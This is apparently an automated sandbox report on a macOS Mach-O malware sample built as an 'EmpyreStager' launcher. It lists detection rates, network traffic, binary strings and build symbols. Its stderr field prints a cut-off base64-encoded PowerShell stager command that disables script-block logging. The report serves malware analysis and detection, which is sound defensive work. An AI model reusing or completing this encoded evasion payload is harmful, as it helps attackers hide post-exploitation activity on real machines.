Source: SwWPxGBaKt.macho |
Virustotal: Detection: 33% |
Perma Link |
Source: SwWPxGBaKt.macho |
ReversingLabs: Detection: 44% |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.171.27.65 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.171.27.65 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.171.27.65 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.253.109.202 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.22.90.177 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 2.22.90.177 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.253.109.202 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp |
String found in binary or memory: http://crl.apple.com/codesigning.crl0 |
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp |
String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd |
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp |
String found in binary or memory: http://www.apple.com/appleca/root.crl0 |
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp |
String found in binary or memory: http://www.apple.com/certificateauthority0 |
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp |
String found in binary or memory: https://www.apple.com/appleca/0 |
Source: SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmp |
String found in binary or memory: https://www.python.org/psf/license/ |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49238 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49238 -> 443 |
Source: classification engine |
Classification label: mal60.evad.macMACHO@0/0@0/0 |
Source: submission SwWPxGBaKt.macho |
Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o |
Source: submission SwWPxGBaKt.macho |
Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o |
Source: submission SwWPxGBaKt.macho |
Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/ |
Source: submission SwWPxGBaKt.macho |
Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/ |
Source: submitted sample |
Stderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW
^SyntaxError: invalid syntax: exit code = 0 |
Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 571) |
Process executable with extension: /Users/berri/Desktop/SwWPxGBaKt.macho |
Jump to behavior |
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571) |
System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist |
Jump to behavior |
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571) |
System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist |
Jump to behavior |